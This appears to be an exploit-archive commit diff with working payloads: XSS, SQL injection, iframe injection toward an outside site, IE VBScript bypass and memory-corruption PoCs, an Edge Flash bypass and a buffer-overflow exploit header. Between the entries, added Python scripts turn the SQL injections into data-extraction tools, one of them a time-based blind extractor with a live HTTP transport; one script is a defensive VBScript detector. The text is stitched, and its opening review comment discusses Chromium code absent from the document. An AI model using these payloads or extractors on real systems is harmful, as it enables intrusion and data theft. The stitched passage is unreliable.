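Review bot: the reason a wrapped id frees the operation should be spelled out next to the `// ! If id already in operations_, this will free operation` marker: the `DCHECK(operations_.find(id) == operations_.end())` on the preceding line is compiled out in release builds, and `emplace` with an existing key does not overwrite, so the moved-in `unique_ptr` is destroyed when the temporary goes away while `operation_raw` in `Truncate` still points at the freed object. Saying that in the prose rather than only in the `// !` markers makes clear that the DCHECK gives no protection in shipped builds, which is exactly what the `TODO(https://crbug.com/864351)` diagnostic is trying to measure. Minor: the prose says `The id is an int` while the code uses the `OperationID` typedef (and the later text writes it `OperationId`); use one spelling and state that `OperationID` is a typedef of `int`, which the suggestion to patch it to `short` implies.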


@ -0,0 +1,16 @@
# Exploit Title: Gila CMS (search) Cross Site Scripting
# Google Dork: intext:"Powered By Gila CMS"
# Date: 11.03.2019
# Exploit Author: Ahmet Ümit BAYRAM
# Vendor Homepage: https://gilacms.com
# Software Link: https://gilacms.com/packages/downloadRelease/1.9.1.zip
# Demo Site: https://gilacms.com/demo/
# Version: 1.9.1
# Tested on: Kali Linux
# CVE: CVE-2019-9647
# Vulnerable Parameter: search
# Payload: <--`<img/src=` onerror=confirm``> --!>
# GET Request: http://localhost/?search=<--`<img/src=` onerror=confirm``> --!>
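Review bot: the entry gives no solution or fixed version (compare the MyBB entry in this commit, which closes with `3. Solution:` / `Update to 1.33`) and does not say where the reflected `search` parameter is rendered, so a reader cannot tell whether a vendor fix exists; add a solution line, or state that none was available at the time of writing. Minor: the title reads `Cross Site Scripting` while the commit message uses `Cross-Site Scripting`; keep the hyphenated form for consistency with the other entry.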


@ -0,0 +1,26 @@
# Exploit Title: MyBB Upcoming Events Plugin 1.32 - Cross-Site Scripting
# Date: 3/8/2019
# Author: 0xB9
# Twitter: @0xB9Sec
# Contact: 0xB9[at]pm.me
# Software Link: https://community.mybb.com/mods.php?action=view&pid=1231
# Version: 1.32
# Tested on: Ubuntu 18.04
# CVE: CVE-2019-9650
1. Description:
This plugin shows upcoming calendar events on the forum index and portal page. Event names are vulnerable to XSS.
2. Proof of Concept:
- Go to the calander.php page and add a new event
- Input a payload for the event name <script>alert('XSS')</script>
Payload will be executed on index.php
3. Solution:
Update to 1.33
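Review bot: `calander.php` in the first proof-of-concept step is a typo for `calendar.php` (MyBB's calendar page); a reader checking the path as written would find no such file. The header also lacks the `# Vendor Homepage:` line that the other entries in this commit carry, and since the description says events are shown on both the forum index and the portal page, the sentence `Payload will be executed on index.php` should say whether the portal page is affected as well.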


@ -0,0 +1,122 @@
===========================================================================================
# Exploit Title: eNdonesia Portal 'banners.php' SQL Inj.
# Dork: N/A
# Date: 19-03-2019
# Exploit Author: Mehmet EMIROGLU
# Vendor Homepage: http://www.endonesia.org/
# Software Link: https://sourceforge.net/projects/endonesia/
# Version: v8.7
# Category: Webapps
# Tested on: Wamp64, Windows
# CVE: N/A
# Software Description: eNdonesia ia a portal software, content management system (CMS) site management system , online publishing system, or whatever you want to name it. For internet, intranet, or on your own PC.
===========================================================================================
# POC - SQLi
# Parameters : bid, banners.php
# Attack Pattern :
-1+or+1%3d1+and+(SELECT+1+and+ROW(1%2c1)%3e(SELECT+COUNT(*)%2cCONCAT(CHAR(95)%2cCHAR(33)%2cCHAR(64)%2cCHAR(52)%2cCHAR(100)%2cCHAR(105)%2cCHAR(108)%2cCHAR(101)%2cCHAR(109)%2cCHAR(109)%2cCHAR(97)%2c0x3a%2cFLOOR(RAND(0)*2))x+FROM+INFORMATION_SCHEMA.COLLATIONS+GROUP+BY+x)a)
# GET Method : http://localhost/endonesia87/banners.php?op=click&bid=-1 or
1=1 and (SELECT 1 and ROW(1,1)>(SELECT
COUNT(*),CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97),0x3a,FLOOR(RAND(0)*2))x
FROM INFORMATION_SCHEMA.COLLATIONS GROUP BY x)a)
===========================================================================================
###########################################################################################
===========================================================================================
# Exploit Title: eNdonesia Portal 'user.php' SQL Inj.
# Dork: N/A
# Date: 19-03-2019
# Exploit Author: Mehmet EMIROGLU
# Vendor Homepage: http://www.endonesia.org/
# Software Link: https://sourceforge.net/projects/endonesia/
# Version: v8.7
# Category: Webapps
# Tested on: Wamp64, Windows
# CVE: N/A
# Software Description: eNdonesia is portal software: a content management system (CMS), site management system, online publishing system, or whatever you want to name it. For internet, intranet, or on your own PC.
===========================================================================================
# POC - SQLi
# Parameters : email, user.php
# Attack Pattern : 1'+OR+1=1+OR+'cw'='cw
# POST Method : http://localhost/endonesia87/user.php
===========================================================================================
###########################################################################################
===========================================================================================
# Exploit Title: eNdonesia Portal 'admin.php' SQL Inj.
# Dork: N/A
# Date: 19-03-2019
# Exploit Author: Mehmet EMIROGLU
# Vendor Homepage: http://www.endonesia.org/
# Software Link: https://sourceforge.net/projects/endonesia/
# Version: v8.7
# Category: Webapps
# Tested on: Wamp64, Windows
# CVE: N/A
# Software Description: eNdonesia is portal software: a content management system (CMS), site management system, online publishing system, or whatever you want to name it. For internet, intranet, or on your own PC.
===========================================================================================
# POC - SQLi
# Parameters : bid, admin.php
# Attack Pattern :
-1+or+1%3d1+and+(SELECT+1+and+ROW(1%2c1)%3e(SELECT+COUNT(*)%2cCONCAT(CHAR(95)%2cCHAR(33)%2cCHAR(64)%2cCHAR(52)%2cCHAR(100)%2cCHAR(105)%2cCHAR(108)%2cCHAR(101)%2cCHAR(109)%2cCHAR(109)%2cCHAR(97)%2c0x3a%2cFLOOR(RAND(0)*2))x+FROM+INFORMATION_SCHEMA.COLLATIONS+GROUP+BY+x)a)
# GET Method : http://localhost/endonesia87/admin.php?op=BannerDelete&bid=-1 or 1=1 and (SELECT 1 and ROW(1,1)>(SELECT COUNT(*),CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97),0x3a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.COLLATIONS GROUP BY x)a)&ok=3
===========================================================================================
===========================================================================================
# Exploit Title: eNdonesia Portal 'bid' Frame Inj.
# Dork: N/A
# Date: 19-03-2019
# Exploit Author: Mehmet EMIROGLU
# Vendor Homepage: http://www.endonesia.org/
# Software Link: https://sourceforge.net/projects/endonesia/
# Version: v8.7
# Category: Webapps
# Tested on: Wamp64, Windows
# CVE: N/A
# Software Description: eNdonesia is portal software: a content management system (CMS), site management system, online publishing system, or whatever you want to name it. For internet, intranet, or on your own PC.
===========================================================================================
# POC - Frame Inj.
# Parameters : bid, admin.php
# Attack Pattern :
%3ciframe+src%3d%22http%3a%2f%2fCyber-Warrior.org%2f%3f%22%3e%3c%2fiframe%3e
# GET Method : http://localhost/endonesia87/admin.php?op=BannerDelete&bid=<iframe src="http://Cyber-Warrior.org/?"></iframe>&ok=3
===========================================================================================
###########################################################################################
===========================================================================================
# Exploit Title: eNdonesia Portal 'fname' Frame Inj.
# Dork: N/A
# Date: 19-03-2019
# Exploit Author: Mehmet EMIROGLU
# Vendor Homepage: http://www.endonesia.org/
# Software Link: https://sourceforge.net/projects/endonesia/
# Version: v8.7
# Category: Webapps
# Tested on: Wamp64, Windows
# CVE: N/A
# Software Description: eNdonesia is portal software: a content management system (CMS), site management system, online publishing system, or whatever you want to name it. For internet, intranet, or on your own PC.
===========================================================================================
# POC - Frame Inj.
# Parameters : fname, admin.php, comments
# Attack Pattern :
%3ciframe+src%3d%22http%3a%2f%2fCyber-Warrior.org%2f%3f%22%3e%3c%2fiframe%3e
# POST Method : http://localhost/endonesia87/friend.php
===========================================================================================
###########################################################################################
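The bid payloads above are the classic MySQL duplicate-key error-based injection: the CHAR() chain spells a marker, and the ROW()/FLOOR(RAND(0)*2)/GROUP BY construction forces a "Duplicate entry" error whose message echoes that marker back, which is how the author confirms injection from an error page. The Python below is an added example, not part of the advisory: it decodes the marker hidden in the page's own payload, generalises the payload so it leaks an arbitrary scalar (the `subquery` argument is this example's addition), and pulls the value back out of a constructed sample error message. The function names and SAMPLE_ERROR are this example's own, not eNdonesia output.

```python
import re
from typing import Optional

# Decoded form of the banners.php/admin.php payload from the advisory above.
PAGE_PAYLOAD = (
    "-1 or 1=1 and (SELECT 1 and ROW(1,1)>(SELECT COUNT(*),CONCAT(CHAR(95),CHAR(33),"
    "CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),"
    "CHAR(97),0x3a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.COLLATIONS GROUP BY x)a)"
)

# Constructed sample of the MySQL error such a payload provokes (not captured from eNdonesia).
SAMPLE_ERROR = (
    "MySQL error 1062: Duplicate entry '_!@4dilemma:5.7.25-0ubuntu0.18.04.1:1' "
    "for key 'group_key'"
)

_CHAR_CALL = re.compile(r"CHAR\(([\d,\s]+)\)", re.IGNORECASE)


def decode_char_seq(payload: str) -> str:
    """Turn every CHAR(n[,n...]) call in a payload back into the text it spells.

    CHAR() is used so the marker needs no quote characters (which addslashes-style
    filters would mangle); decoding it is the first step when triaging such a log entry.
    """
    codes = []
    for group in _CHAR_CALL.findall(payload):
        codes.extend(int(n) for n in group.split(",") if n.strip())
    return "".join(chr(c) for c in codes)


def char_seq(text: str) -> str:
    """Inverse of decode_char_seq, in the compact CHAR(a,b,c) form."""
    return "CHAR(" + ",".join(str(ord(c)) for c in text) + ")"


def build_dupkey_payload(subquery: str, marker: str = "_!@4dilemma") -> str:
    """Generalise the advisory's payload so it leaks `subquery` instead of only proving injection.

    FLOOR(RAND(0)*2) is deterministic (it starts 0,1,1,0,...), so GROUP BY on a CONCAT of it
    with a constant produces the same key twice and MySQL raises
    "Duplicate entry '<marker>:<value>:1' for key ...", carrying the value in the error text.
    INFORMATION_SCHEMA.COLLATIONS is used only because it always has enough rows for the collision.
    """
    return (
        "-1 or 1=1 and (SELECT 1 and ROW(1,1)>(SELECT COUNT(*),CONCAT("
        f"{char_seq(marker)},0x3a,({subquery}),0x3a,FLOOR(RAND(0)*2))x "
        "FROM INFORMATION_SCHEMA.COLLATIONS GROUP BY x)a)"
    )


def extract_from_error(body: str, marker: str = "_!@4dilemma") -> Optional[str]:
    """Pull the leaked value out of a response body that contains the duplicate-key error."""
    pattern = r"Duplicate entry '" + re.escape(marker) + r":(.*?):[01]' for key"
    m = re.search(pattern, body)
    return m.group(1) if m else None


if __name__ == "__main__":
    print(decode_char_seq(PAGE_PAYLOAD))      # the marker hidden in the advisory's payload
    print(build_dupkey_payload("version()"))
    print(extract_from_error(SAMPLE_ERROR))
```

Note that the error message only reaches the attacker when the application prints database errors to the page; with display_errors off the same payload still triggers the collision but leaks nothing, and a time-based approach is needed instead.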

@ -0,0 +1,16 @@
# Exploit Title: Netartmedia Event Portal 2.0 - 'Email' SQL Injection
# Date: 19.03.2019
# Exploit Author: Ahmet Ümit BAYRAM
# Vendor Homepage: https://www.netartmedia.net/eventportal/
# Demo Site: https://www.phpscriptdemos.com/events/
# Version: 2.0
# Tested on: Kali Linux
# CVE: N/A
# Description: Event Portal is web software (a PHP script) that can be used to create advanced, multi-user event listing and ticket selling websites.
----- PoC: SQLi (time-based blind) -----
# POST Request: http://localhost/[PATH]/loginaction.php
# Vulnerable Parameter: Email
# Payload: '||(SELECT 0x59685353 FROM DUAL WHERE 7114=7114 AND SLEEP(5))||'

@ -0,0 +1,22 @@
# Exploit Title: Netartmedia PHP Mall 4.1 - Multiple SQL Injection
# Date: 19.03.2019
# Exploit Author: Ahmet Ümit BAYRAM
# Vendor Homepage: https://www.netartmedia.net/mall/
# Demo Site: https://www.phpscriptdemos.com/mall/
# Version: 4.1
# Tested on: Kali Linux
# CVE: N/A
# Description: PHP Mall is one of the first multi-store and multi-vendor PHP scripts (offered since 2006) and is successfully used on many websites today.
----- PoC 1 : SQLi (time-based blind) -----
# Request: http://localhost/[PATH]/index.php
# Parameter: id (GET)
# Payload: id=1 AND SLEEP(5)&item=&lang=en&mod=details
----- PoC 2 : SQLi (time-based blind) ----
# Request: http://localhost/[PATH]/loginaction.php
# Parameter: Email (POST)
# Payload: Email=0'XOR(if(now()=sysdate(),sleep(0),0))XOR'Z' OR SLEEP(5) AND 'tOoX'='tOoX&Password=g00dPa$$w0rD&lang=en

@ -0,0 +1,58 @@
# Exploit Title: Netartmedia Real Estate Portal 5.0 - Multiple SQL Injection
# Date: 19.03.2019
# Exploit Author: Ahmet Ümit BAYRAM
# Vendor Homepage: https://www.netartmedia.net/realestate/
# Demo Site: https://www.phpscriptdemos.com/realestate/
# Version: 5.0
# Tested on: Kali Linux
# CVE: N/A
# Description: The real estate portal software is made to be multi-language: the main site can show multiple languages and let the site visitors choose their preferred language.
----- PoC 1: SQLi -----
Request: http://localhost/[PATH]/index.php
Parameter: user_email (POST)
Payload:
ProceedSend=1&mod=forgotten_password&user_email=0'XOR(if(now()=sysdate(),sleep(0),0))XOR'Z' OR SLEEP(5)#
----- PoC 2: SQLi -----
Request: http://localhost/[PATH]/index.php
Parameter: page (multipart/form-data POST)
Payload:
------WebKitFormBoundaryYUBPFrrBhV4S4pf0
Content-Disposition: form-data; name="SubmitContact"

1
------WebKitFormBoundaryYUBPFrrBhV4S4pf0
Content-Disposition: form-data; name="code"

94102
------WebKitFormBoundaryYUBPFrrBhV4S4pf0
Content-Disposition: form-data; name="email"

sample@email.tst
------WebKitFormBoundaryYUBPFrrBhV4S4pf0
Content-Disposition: form-data; name="message"

20
------WebKitFormBoundaryYUBPFrrBhV4S4pf0
Content-Disposition: form-data; name="name"

${alpharand}
------WebKitFormBoundaryYUBPFrrBhV4S4pf0
Content-Disposition: form-data; name="page"

en_Contact-2228' OR 3801=3801-- eISZ
------WebKitFormBoundaryYUBPFrrBhV4S4pf0
Content-Disposition: form-data; name="phone"

555-666-0606
------WebKitFormBoundaryYUBPFrrBhV4S4pf0
Content-Disposition: form-data; name="subject"

1
------WebKitFormBoundaryYUBPFrrBhV4S4pf0--
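The three Netartmedia advisories above (Event Portal, PHP Mall and Real Estate Portal) all stop at the detection payload: a SLEEP(5) that makes the login or forgotten-password request hang. The Python below is an added example, not the author's code, showing what a practitioner does next with such a timing oracle: confirm it in both directions (a true condition must be slow and a false one fast, otherwise a slow host gets misreported as injectable) and then leak a value character by character with binary search. The payload shape is a simplified variant of the ones above (a plain `0' OR IF(...,SLEEP(n),0)#`), the form field names in http_oracle are assumed from the PoCs, and SimulatedTarget is a constructed stand-in so the example runs offline; nothing here was run against a Netartmedia install.

```python
import re
import time
import urllib.parse
import urllib.request
from typing import Callable

DELAY = 5          # seconds of SLEEP(), as in the PoCs above
MARGIN = 0.8       # a response slower than DELAY*MARGIN counts as "slept"

# An oracle takes the value to inject and returns the observed round-trip time in seconds.
Oracle = Callable[[str], float]


def sleep_payload(condition: str, delay: int = DELAY) -> str:
    """Close the quoted string, OR in a conditional SLEEP, and comment out the rest (MySQL)."""
    return f"0' OR IF({condition},SLEEP({delay}),0)#"


def is_time_blind(oracle: Oracle, delay: int = DELAY) -> bool:
    """Confirm the side channel both ways: a true condition must be slow AND a false one fast."""
    slow = oracle(sleep_payload("1=1", delay))
    fast = oracle(sleep_payload("1=2", delay))
    return slow >= delay * MARGIN and fast < delay * MARGIN


def extract_string(oracle: Oracle, expr: str, max_len: int = 64, delay: int = DELAY) -> str:
    """Leak the value of a MySQL scalar (e.g. 'version()') one character at a time.

    Binary search over the ASCII range costs at most 7 requests per character. SUBSTRING past
    the end of the string yields '' and ASCII('') is 0, which is how the loop knows to stop.
    """
    out = []
    for pos in range(1, max_len + 1):
        lo, hi = 0, 127
        while lo < hi:
            mid = (lo + hi) // 2
            cond = f"ASCII(SUBSTRING(({expr}),{pos},1))>{mid}"
            if oracle(sleep_payload(cond, delay)) >= delay * MARGIN:
                lo = mid + 1
            else:
                hi = mid
        if lo == 0:
            break
        out.append(chr(lo))
    return "".join(out)


def http_oracle(url: str, field: str = "Email", extra=None) -> Oracle:
    """Real transport for a form like loginaction.php (field names assumed from the PoCs)."""
    def send(value: str) -> float:
        form = {field: value, "Password": "x", "lang": "en"}
        form.update(extra or {})
        body = urllib.parse.urlencode(form).encode()
        started = time.monotonic()
        try:
            urllib.request.urlopen(urllib.request.Request(url, data=body), timeout=DELAY * 4)
        except Exception:
            pass  # a timeout is still a timing measurement
        return time.monotonic() - started
    return send


class SimulatedTarget:
    """Constructed stand-in for the vulnerable form so the example runs offline.

    It parses the injected IF(...) back out of the value, evaluates the condition against a
    made-up secret, and reports a pretend round-trip time instead of really sleeping.
    """
    SECRET = "5.7.25"
    _inj = re.compile(r"IF\((?P<cond>.+?),SLEEP\((?P<d>\d+)\),0\)#$")
    _sub = re.compile(r"ASCII\(SUBSTRING\(\((?P<expr>.+)\),(?P<pos>\d+),1\)\)>(?P<n>\d+)$")

    def __call__(self, value: str) -> float:
        m = self._inj.search(value)
        if not m:
            return 0.1                       # no injection: normal, fast response
        return int(m["d"]) + 0.2 if self._true(m["cond"]) else 0.1

    def _true(self, cond: str) -> bool:
        if cond in ("1=1", "1=2"):
            return cond == "1=1"
        m = self._sub.fullmatch(cond)
        if not m:
            raise ValueError(f"unsupported condition: {cond}")
        pos = int(m["pos"])
        ch = self.SECRET[pos - 1:pos]
        return (ord(ch) if ch else 0) > int(m["n"])


if __name__ == "__main__":
    target = SimulatedTarget()           # swap for http_oracle("http://host/[PATH]/loginaction.php")
    print("time-based blind confirmed:", is_time_blind(target))
    print("leaked:", extract_string(target, "version()"))
```

Against a real host, the MARGIN threshold should be tuned from a few baseline measurements first; network jitter of a second or two is common, which is why the PoCs pick 5 seconds rather than 1.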

@ -0,0 +1,36 @@
<!--
Windows: IE11 VBScript execution policy bypass in MSHTML
Platform: Windows 10 1809 (not tested earlier)
Class: Security Feature Bypass
Summary:
MSHTML only checks for the CLSID associated with VBScript when blocking it in the Internet Zone, but doesn't check other VBScript CLSIDs, which allows a web page to bypass the security zone policy.
Description:
According to https://blogs.windows.com/msedgedev/2017/07/07/update-disabling-vbscript-internet-explorer-11/, Starting from Windows 10 Fall Creators Update, VBScript execution in IE 11 should be disabled for websites in the Internet Zone and the Restricted Sites Zone by default.
The check for the VBScript security zone policy is done in MSHTML!AllowVBScript, which is only called from MSHTML!CScriptCollection::GetHolderCLSID if the script language CLSID matches {b54f3741-5b07-11cf-a4b0-00aa004a55e8}. However, IE still supports the old VBScript.Encode language, which has the slightly different CLSID {b54f3743-5b07-11cf-a4b0-00aa004a55e8}. Therefore, to bypass the VBScript zone security policy it's enough to change the language attribute in the HTML from "VBScript" to "VBScript.Encode". To add insult to injury, you don't even need to encode the VBScript: if the engine detects that the script is not encoded, it parses it as plain unencoded script.
Proof of Concept:
I've provided a PoC as an HTML file with a meta tag to force IE5 compatibility. Just host it on an HTTP server.
1) Browse IE11 to the PoC on the web server.
Expected Result:
No VBScript is executed.
Observed Result:
VBScript is executed and a message box is displayed.
-->
<html>
<head>
<meta http-equiv="x-ua-compatible" content="IE=5">
</head>
<body>
<script language="VBScript.Encode">
MsgBox "Hello"
</script>
</body>
</html>
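Because the policy gap is a second engine identifier rather than a missing setting, the defensive check is to catch every way a page can select the VBScript family of engines, not just language="VBScript". The following Python is an added example (not part of the Project Zero report) of such a check for a proxy, mail gateway or hunt script: it flags script blocks by both the language and type attributes, marks the VBScript.Encode variant the PoC relies on, and records x-ua-compatible document-mode pins, since the PoC also forces IE=5. The attribute value sets are this example's own list and may be incomplete; SAMPLE_PAGE is the PoC above plus a constructed JavaScript block that must not be flagged.

```python
from html.parser import HTMLParser
from typing import Dict, List

# Ways a <script> block can ask MSHTML for a VBScript engine (lower-cased; list assumed, not exhaustive).
VBSCRIPT_LANGUAGES = {"vbscript", "vbs", "vbscript.encode"}
VBSCRIPT_MIME_TYPES = {"text/vbscript", "text/vbs", "text/vbscript.encode", "application/x-vbscript"}


class LegacyScriptFinder(HTMLParser):
    """Flag <script> blocks that select a VBScript engine, plus x-ua-compatible document-mode pins."""

    def __init__(self) -> None:
        super().__init__()
        self.scripts: List[Dict] = []
        self.doc_modes: List[str] = []

    def handle_starttag(self, tag, attrs):
        # HTMLParser lower-cases tag and attribute names; values are normalised here.
        a = {k.lower(): (v or "").strip().lower() for k, v in attrs}
        if tag == "meta" and a.get("http-equiv") == "x-ua-compatible":
            self.doc_modes.append(a.get("content", ""))
        if tag != "script":
            return
        language = a.get("language", "")
        mime = a.get("type", "").split(";")[0].strip()   # drop any ;charset= suffix
        if language in VBSCRIPT_LANGUAGES or mime in VBSCRIPT_MIME_TYPES:
            self.scripts.append({
                "line": self.getpos()[0],
                "language": language or None,
                "type": mime or None,
                # the variant the PoC above relies on: a different engine CLSID, same policy gap
                "encode_engine": language.endswith(".encode") or mime.endswith(".encode"),
            })


def scan_html(html: str) -> Dict:
    """Return the VBScript script blocks and document-mode pins found in a page."""
    parser = LegacyScriptFinder()
    parser.feed(html)
    parser.close()
    return {"vbscript_blocks": parser.scripts, "document_modes": parser.doc_modes}


# The PoC from the report above, plus a constructed JavaScript block that must not be flagged.
SAMPLE_PAGE = """<html>
<head>
<meta http-equiv="x-ua-compatible" content="IE=5">
</head>
<body>
<script type="text/javascript">console.log("benign");</script>
<script language="VBScript.Encode">
MsgBox "Hello"
</script>
</body>
</html>"""

if __name__ == "__main__":
    print(scan_html(SAMPLE_PAGE))
```

A hit with encode_engine set is the signature of this specific bypass; an ordinary language="VBScript" hit is still worth flagging, since the fix on the MSHTML side should block both identically.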

@ -0,0 +1,77 @@
<!--
There is an issue in VBScript in the VbsErase function. In some cases (see the attached PoC), VbsErase fails to clear the argument variable properly, which can trivially lead to crafting a variable with the array type but with a pointer controlled by an attacker. This issue was most likely introduced in an attempt to fix a previously reported issue in VbsErase (https://bugs.chromium.org/p/project-zero/issues/detail?id=1668).
Debug log (Note: this was tested on Windows 10 64-bit v1809 with the most recent patches applied):
(25b4.efc): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
VBSCRIPT!VbsErase+0x5a:
6e0fc9fa 8b3e mov edi,dword ptr [esi] ds:002b:13371337=????????
0:009:x86> r
eax=0000600c ebx=05dc10dc ecx=00000000 edx=00000000 esi=13371337 edi=05c5ca44
eip=6e0fc9fa esp=05c5ca28 ebp=05c5ca48 iopl=0 nv up ei pl zr na pe nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010246
VBSCRIPT!VbsErase+0x5a:
6e0fc9fa 8b3e mov edi,dword ptr [esi] ds:002b:13371337=????????
0:009:x86> k
# ChildEBP RetAddr
00 05c5ca48 6e0beac7 VBSCRIPT!VbsErase+0x5a
01 05c5ca64 6e0b9d64 VBSCRIPT!StaticEntryPoint::Call+0x37
02 05c5cb9c 6e0b8297 VBSCRIPT!CScriptRuntime::RunNoEH+0xc94
03 05c5cbec 6e0b81b5 VBSCRIPT!CScriptRuntime::Run+0xc7
04 05c5ccfc 6e0b354d VBSCRIPT!CScriptEntryPoint::Call+0xe5
05 05c5cd90 6e0ae175 VBSCRIPT!CSession::Execute+0x52d
06 05c5cdd8 6e0c0638 VBSCRIPT!COleScript::ExecutePendingScripts+0x14a
07 05c5ce6c 6e0c03e9 VBSCRIPT!COleScript::ParseScriptTextCore+0x24b
08 05c5ce98 7053ff31 VBSCRIPT!COleScript::ParseScriptText+0x29
09 05c5ced0 7053f847 MSHTML!CActiveScriptHolder::ParseScriptText+0x51
0a 05c5cf40 7053ee02 MSHTML!CScriptCollection::ParseScriptText+0x182
0b 05c5d02c 7053f50e MSHTML!CScriptData::CommitCode+0x312
0c 05c5d0a8 7053e35a MSHTML!CScriptData::Execute+0x1ba
0d 05c5d0c8 7053c526 MSHTML!CHtmScriptParseCtx::Execute+0xaa
0e 05c5d11c 70635a4c MSHTML!CHtmParseBase::Execute+0x186
0f 05c5d13c 70635319 MSHTML!CHtmPost::Broadcast+0x14c
10 05c5d264 7060b4dd MSHTML!CHtmPost::Exec+0x339
11 05c5d284 7060b3d6 MSHTML!CHtmPost::Run+0x3d
12 05c5d2a4 7060b368 MSHTML!PostManExecute+0x60
13 05c5d2b8 7060b2d9 MSHTML!PostManResume+0x6f
14 05c5d2e8 70596767 MSHTML!CHtmPost::OnDwnChanCallback+0x39
15 05c5d300 70637b9b MSHTML!CDwnChan::OnMethodCall+0x27
16 05c5d37c 706381b3 MSHTML!GlobalWndOnMethodCall+0x1cb
17 05c5d3cc 75dc635b MSHTML!GlobalWndProc+0x1f3
18 05c5d3f8 75db729c USER32!_InternalCallWinProc+0x2b
19 05c5d4dc 75db63db USER32!UserCallWinProcCheckWow+0x3ac
1a 05c5d550 75db61b0 USER32!DispatchMessageWorker+0x21b
1b 05c5d55c 71a41e05 USER32!DispatchMessageW+0x10
1c 05c5f6e0 71a413b3 IEFRAME!CTabWindow::_TabWindowThreadProc+0x435
1d 05c5f7a0 724bdf6c IEFRAME!LCIETab_ThreadProc+0x403
1e 05c5f7b8 715b24bd msIso!_IsoThreadProc_WrapperToReleaseScope+0x1c
1f 05c5f7f0 75fdfe09 IEShims!NS_CreateThread::AutomationIE_ThreadProc+0x8d
20 05c5f800 77ab662d KERNEL32!BaseThreadInitThunk+0x19
21 05c5f85c 77ab65fd ntdll_77a50000!__RtlUserThreadStart+0x2f
22 05c5f86c 00000000 ntdll_77a50000!_RtlUserThreadStart+0x1b
-->
<!-- saved from url=(0016)http://localhost -->
<meta http-equiv="x-ua-compatible" content="IE=10">
<script type="text/vbscript">
Class class5
Private Sub Class_Terminate()
var4 = &h13371337
ReDim var4(10000000000)
End Sub
End Class
On Error Resume Next
msgbox "start"
Dim var4(10)
set var4(1) = new class5
Erase var4
Erase var4
</script>

@ -0,0 +1,48 @@
Attached is a PoC file that bypasses Flash click2play in Microsoft Edge. This was tested on Windows 10 64-bit v1809 with the latest patches applied. The PoC currently loads a swf from wwwimages.adobe.com (screenshot attached), but it can load a swf from any domain, and the PoC itself can be hosted on any domain. Note that there is a race condition with respect to displaying the loaded Flash object, so if you run the PoC and don't see anything after several seconds, refresh the page or load the PoC again; it worked fairly reliably in my experiments.
To see how it works, let's first examine the CObjectElement::FinalCreateObject, which gets called eventually after a new <object> element is created. The code relevant for this vulnerability is:
int CObjectElement::FinalCreateObject(...) {
CLSID clsid;
...
RetrieveClassidAndData(..., &clsid, ...)
...
if(!COleSite::AllowCreate(this, clsid, ...)) {
OnFailToCreate();
return 0x80070005;
}
...
if(clsid == CLSID_MacromediaSwFlash && CDOMPluginArray::IsFlashCreateable(...)) {
...
CView::AddPendingSizeDeterminationOleSite(...)
} else {
COleSite::CreateObject(this, clsid);
}
...
}
Looking at the line
if(clsid == CLSID_MacromediaSwFlash && CDOMPluginArray::IsFlashCreateable(...))
you can see that if clsid is Flash clsid and if IsFlashCreateable() returns true, the Flash object will be loaded at a later time. This happens in COleSite::ProcessObjectAfterSizeDetermined after checking if either the user explicitly allowed Flash for this site, or if the site is "trusted by platform". This is how Flash objects are normally loaded.
However, in the opposite case, if clsid != CLSID_MacromediaSwFlash *or* if IsFlashCreateable() returns false (regardless of the clsid), COleSite::CreateObject is called, which creates the object immediately without performing any additional checks. Essentially the logic here in case of clsid == CLSID_MacromediaSwFlash is "If Flash isn't creatable, create the Flash object anyway", which is a bit strange and which is what the PoC exploits.
However, exercising this path is not trivial because of the earlier AllowCreate() check. AllowCreate() and IsFlashCreateable() perform very similar checks - they both eventually call COleSite::AllowCreateSecurityChecks. This means that in most of the cases where IsFlashCreateable() returns false, AllowCreate() returns false as well.
In most cases, but not all :-)
Specifically, in COleSite::AllowCreate, if the current <object> element does not have an associated Markup (is not a part of any element tree), then AllowCreate() calls COleSite::AllowCreateSecurityChecks() with the 4th argument set to 0. This has the effect that most checks will be skipped and AllowCreate() will return true (almost) always.
Now we just need to make CDOMPluginArray::IsFlashCreateable return false, and in the PoC this is done by making the associated document of the current <object> element a "dynamic" document.
This way, COleSite::CreateObject is called without click2play checks.
However, if we leave a PoC at this stage, there is going to be a (non-fatal) exception in communication between the Content Process and the Plugin Process. I'm not sure if this happens before or after the Flash object is actually loaded. In any case, we can avoid this by quickly putting the <object> element into a "normal" document tree. This also causes the Flash object to be shown on the page normally, for a dramatic effect :-)
Please also note that most of the logic shown above for CObjectElement::FinalCreateObject is also present in CPluginSite::FinishCreateObject, which is used for handling for example <embed> elements. While the current PoC does not work on <embed> elements as is, it might be possible to make it work with some modifications. So, when fixing CObjectElement::FinalCreateObject, please remember to also address CPluginSite::FinishCreateObject.
Proof of Concept:
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/46569.zip

exploits/windows/local/46561.py Executable file
@ -0,0 +1,124 @@
#!/usr/bin/env python
#------------------------------------------------------------------------------------------------------------------------------------#
# Exploit: Advanced Host Monitor 11.92 beta - Local Buffer Overflow (EggHunter) #
# Date: 2019-03-18 #
# Author: Peyman Forouzan #
# Tested Against: Winxp SP2 32-64 bit - Win7 Enterprise SP1 32-64 bit - Win10 Enterprise 32-64 bit #
# Software Download #1: https://www.ks-soft.net/download/hm1192.exe #
# Software Download #2: https://www.ip-tools.biz/download/hm1192.exe #
# Version: 11.92 beta #
# The Program also has SEH Overflow, Which can be implemented in a similar way #
# Special Thanks to my wife #
# Steps : Open the APP --> Tools --> Trace (or Telnet) --> paste in contents from the egg.txt into "Host" --> Start --> Close #
# Advanced Host Monitor --> Options --> Startup --> paste in contents from the egghunter-winxp-win7.txt or #
# egghunter-win10.txt (depending on your Windows version) into "load specific HTML file" --> Save --> Wait a little --> #
# Shellcode (Calc) open #
#------------------------------------------------------------------------------------------------------------------------------------#
# "Egg" shellcode into memory --> Egghunter field overflow: EIP overwrite #
#------------------------------------------------------------------------------------------------------------------------------------#
